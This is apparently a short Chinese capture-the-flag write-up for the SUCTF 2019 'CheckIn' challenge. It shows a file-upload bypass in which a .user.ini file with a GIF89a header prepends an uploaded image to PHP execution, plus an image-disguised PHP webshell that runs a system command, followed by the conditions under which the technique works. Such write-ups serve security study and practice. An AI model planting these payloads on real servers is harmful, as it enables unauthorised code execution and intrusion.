[SUCTF 2019]CheckIn 1

一 前置知识

.user.ini文件

 

 

 

参考

 二 解题

上传.user.ini文件,将我们上传的图片马当做php解析执行

GIF89a
auto_prepend_file=shell.jpg

上传图片马

GIF89a
<script language='php'>system('cat /flag');</script>

访问upload的index.php 得到flag

综上所述.user.ini的利用条件如下:

  1. 服务器脚本语言为PHP
  2. 服务器使用CGI/FastCGI模式
  3. 上传目录下要有可执行的php文件(本题的上传目录就有index.php可执行文件)
posted @ 2021-07-29 15:32  C10ud  阅读(98)  评论(0编辑  收藏  举报